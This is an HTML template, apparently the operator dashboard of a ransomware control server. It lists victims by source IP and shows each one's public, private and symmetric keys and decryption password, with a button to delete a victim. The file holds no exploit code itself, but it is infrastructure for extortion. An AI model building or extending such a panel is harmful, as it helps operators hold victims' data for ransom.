<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.3.1/dist/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">
<link href="https://fonts.googleapis.com/css2?family=Roboto+Slab&family=Roboto:wght@100;300&display=swap" rel="stylesheet">
<style>
  h1 {
    text-align:center;
    font-size:5em;
    font-family: 'Roboto', sans-serif;
    padding-bottom:2em;
    padding-top:1em;
  }
  /*header--------------------------------------------*/

*{text-decoration:none; list-style:none; margin:0px; padding:0px; outline:none;}
body{margin:0px; padding:0px;padding-bottom: 5em;font-family: 'Roboto', sans-serif;}
section{width:100%; max-width:1200px; margin:0px auto; display:table; position:relative;}
header h1{margin:0px auto; display:table; font-size:26px; padding:40px 0px; color:#ffffff; text-align:center;}
header h1 span{font-weight:500;}

header{width:100%; display:table; background-color:#262b2c; margin-bottom:75px;}
#logo{float:left; font-size:24px; color:#ffffff; font-weight:600; padding:20px 0px;}
header nav{width:auto; float:right;}
header nav ul{display:table; float:right;}
header nav ul li{float:left;}
header nav ul li:last-child{padding-right:0px;}
header nav ul li a{color:#ffffff; font-size:18px; padding: 25px 20px; display:inline-block; transition: all 0.5s ease 0s;}
header nav ul li a:hover{background-color:#34ddf3; color:#ffffff; transition: all 0.5s ease 0s;}
header nav ul li a:hover i{color:#ffffff; transition: all 0.5s ease 0s;}
header nav ul li a i{padding-right:10px; color:#ffffff; transition: all 0.5s ease 0s;}

header .toggle-menu ul{display:table; width:25px;}
header .toggle-menu ul li{width:100%; height:3px; background-color:#ffffff; margin-bottom:4px;}
header .toggle-menu ul li:last-child{margin-bottom:0px;}


.content{display:table; margin-bottom:60px; width:3000px;}
.content h2{font-size:18px; font-weight:500; color:#ffffff; border-bottom:1px solid #fde428; display:table; padding-bottom:10px; margin-bottom:10px;}
.content p{font-size:14px; line-height:22px; color:#7c7c7c; text-align:justify;}

@media only screen and (max-width: 1440px) {
section{max-width:95%;}
}

@media only screen and (max-width: 980px) {
header{padding:20px 0px;}
#logo{padding:0px;}
header label {float:right; padding:8px 0px; display:inline-block; cursor:pointer; }

header nav{display:none; position:absolute; right:0px; top:53px; background-color:#ffffff; padding:0px; z-index:1110;}
header nav ul{width:auto;}
header nav ul li{float:none; padding:0px; width:100%; display:table;}
header nav ul li a{color:#FFF; font-size:15px; padding:10px 20px; display:block; border-bottom: 1px solid rgba(225,225,225,0.1);}
header nav ul li a i{color:#fde428; padding-right:13px;}
}

button {
  background-color: #262b2c;
  border: none;
  color: white;
  padding: 15px 32px;
  text-align: center;
  text-decoration: none;
  display: inline-block;
  font-size: 16px;
  margin-bottom: 2%;
}
.button {
  background-color: #262b2c;
  border: none;
  color: white;
  padding: 15px 32px;
  text-align: center;
  text-decoration: none;
  display: inline-block;
  font-size: 16px;
  margin-bottom: 2%;
}
#accordion {
  padding-left: 10%;
  padding-right: 10%;
}
.card-body {
  padding-left: 10%;
  padding-right: 10%;
}
.alert {
  font-weight: bold;
}
canvas {
  margin-left:10em;
}


</style>

<head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, user-scalable=no">
        <title>Clients informations</title>
    </head>
    <!--fin en tete-->
    <!--Debut menu-->
    <header>
      <section>
            <a id="logo" target="_blank">Logged as : {{user}}</a>
        </section>
    </header>



<h1>Clients Informations</h1>
{%for i in ransom_keys.keys()%}

  <div id="accordion">
      <div class="card">
        <div class="card-header" id="headingOne">
          <h5 class="mb-0">
            <button class="btn btn-link" data-toggle="collapse" data-target="#collapse{{i.replace('.','')}}" aria-expanded="true" aria-controls="collapse{{i.replace('.','')}}">
              Source IP : {{i}}
            </button>
          </h5>
        </div>

        <div id="collapse{{i.replace('.','')}}" class="collapse" aria-labelledby="heading{{i.replace('.','')}}" data-parent="#accordion">
          <div class="card-body">



            <p>
              <a class="btn btn-primary" data-toggle="collapse" href="#collapseExample{{i.replace('.','')}}1" role="button" aria-expanded="false" aria-controls="collapseExample{{i.replace('.','')}}1">
                Public Key
              </a>
              <a class="btn btn-primary" data-toggle="collapse" href="#collapseExample{{i.replace('.','')}}2" role="button" aria-expanded="false" aria-controls="collapseExample{{i.replace('.','')}}2">
                Private Key
              </a>
              <a class="btn btn-primary" data-toggle="collapse" href="#collapseExample{{i.replace('.','')}}3" role="button" aria-expanded="false" aria-controls="collapseExample{{i.replace('.','')}}3">
                Symetric Key
              </a>
              <a class="btn btn-primary" data-toggle="collapse" href="#collapseExample{{i.replace('.','')}}4" role="button" aria-expanded="false" aria-controls="collapseExample{{i.replace('.','')}}4">
                Password
              </a>
              <a class="btn btn-primary" href="/delete_key/{{i.replace('.','')}}">
                Delete Client
              </a>
            </p>
            <div class="collapse" id="collapseExample{{i.replace('.','')}}1">

              {% autoescape false %}
              <div class="card card-body">
                {{ransom_keys[i][0][2:-1]}}
              </div>
              {%endautoescape%}
            </div>
            <div class="collapse" id="collapseExample{{i.replace('.','')}}2">
              <div class="card card-body">
                {% autoescape false %}
                {{ransom_keys[i][1][2:-1]}}
                {%endautoescape%}
              </div>
            </div>
            <div class="collapse" id="collapseExample{{i.replace('.','')}}3">
              <div class="card card-body">
                {{sym[i]}}
              </div>
            </div>
            <div class="collapse" id="collapseExample{{i.replace('.','')}}4">
              <div class="card card-body">
                {{decryption_keys[i]}}
              </div>
            </div>






          </div>
        </div>
      </div>
    </div>

{%endfor%}

<br/>

<script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/popper.js@1.14.7/dist/umd/popper.min.js" integrity="sha384-UO2eT0CpHqdSJQ6hJty5KVphtPhzWj9WO1clHTMGa3JDZwrnQq4sF86dIHNDz0W1" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@4.3.1/dist/js/bootstrap.min.js" integrity="sha384-JjSmVgyd0p3pXB1rRibZUAYoIIy6OrQ6VrjIEaFf/nJGzIxFDsf4x0xIM+B07jRM" crossorigin="anonymous"></script>
